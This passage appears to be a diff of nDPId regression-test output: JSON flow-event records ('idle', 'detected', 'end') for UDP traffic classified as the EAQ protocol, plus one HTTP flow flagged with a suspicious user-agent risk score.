{"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820956931,"flow_last_seen":1432821043151,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.68","src_port":47714,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820968101,"flow_last_seen":1432821032791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.67","src_port":60013,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820950865,"flow_last_seen":1432821036155,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.68","src_port":43641,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820949586,"flow_last_seen":1432821035895,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.138.146","src_port":52257,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820959095,"flow_last_seen":1432821045664,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.66","src_port":56128,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820963101,"flow_last_seen":1432821027791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.68","src_port":43934,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820957932,"flow_last_seen":1432821044555,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.66","src_port":43979,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820966101,"flow_last_seen":1432821030791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.67","src_port":50175,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820954931,"flow_last_seen":1432821041151,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.67","src_port":37985,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820970111,"flow_last_seen":1432821034791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.67","src_port":40058,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820949806,"flow_last_seen":1432821014655,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821014655,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.66","src_port":41438,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820950935,"flow_last_seen":1432821015651,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821015651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.68","src_port":34687,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820951932,"flow_last_seen":1432821016651,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821016651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.67","src_port":39221,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":148,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820952931,"flow_last_seen":1432821017651,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821017651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.66","src_port":53354,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820953931,"flow_last_seen":1432821018651,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821018651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.68","src_port":59959,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820954931,"flow_last_seen":1432821019651,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821019651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.67","src_port":37985,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820955933,"flow_last_seen":1432821020651,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821020651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.66","src_port":48666,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820956931,"flow_last_seen":1432821021652,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821021652,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.68","src_port":47714,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820957985,"flow_last_seen":1432821022695,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821022695,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.67","src_port":48563,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820959095,"flow_last_seen":1432821023795,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821023795,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.66","src_port":56128,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820960101,"flow_last_seen":1432821024791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821024791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.67","src_port":57004,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":162,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820962101,"flow_last_seen":1432821025791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821025791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.66","src_port":36552,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":163,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820961101,"flow_last_seen":1432821026791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821026791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.68","src_port":53059,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820963101,"flow_last_seen":1432821027791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821027791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.68","src_port":43934,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820964101,"flow_last_seen":1432821028791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821028791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.66","src_port":47346,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820965101,"flow_last_seen":1432821029791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821029791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.68","src_port":59098,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820966101,"flow_last_seen":1432821030791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821030791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.67","src_port":50175,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":168,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820967101,"flow_last_seen":1432821031791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821031791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.68","src_port":36577,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":169,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820968101,"flow_last_seen":1432821032791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821032791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.67","src_port":60013,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":170,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820969101,"flow_last_seen":1432821033791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821033791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.66","src_port":33356,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820970111,"flow_last_seen":1432821034791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821034791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.67","src_port":40058,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820957985,"flow_last_seen":1432821044555,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.67","src_port":48563,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820959035,"flow_last_seen":1432821045664,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.68","src_port":52726,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820949685,"flow_last_seen":1432821035985,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.125.226","src_port":48890,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820955933,"flow_last_seen":1432821042151,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.66","src_port":48666,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820950801,"flow_last_seen":1432821036105,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.66","src_port":42620,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820960101,"flow_last_seen":1432821024791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.67","src_port":57004,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820962101,"flow_last_seen":1432821025791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.66","src_port":36552,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1432820948836,"flow_last_seen":1432820949347,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2764,"flow_tot_l4_payload_len":9813,"flow_avg_l4_payload_len":700,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.24","src_port":40467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious 
User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820965101,"flow_last_seen":1432821029791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.68","src_port":59098,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820967101,"flow_last_seen":1432821031791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.68","src_port":36577,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820961101,"flow_last_seen":1432821026791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.68","src_port":53059,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 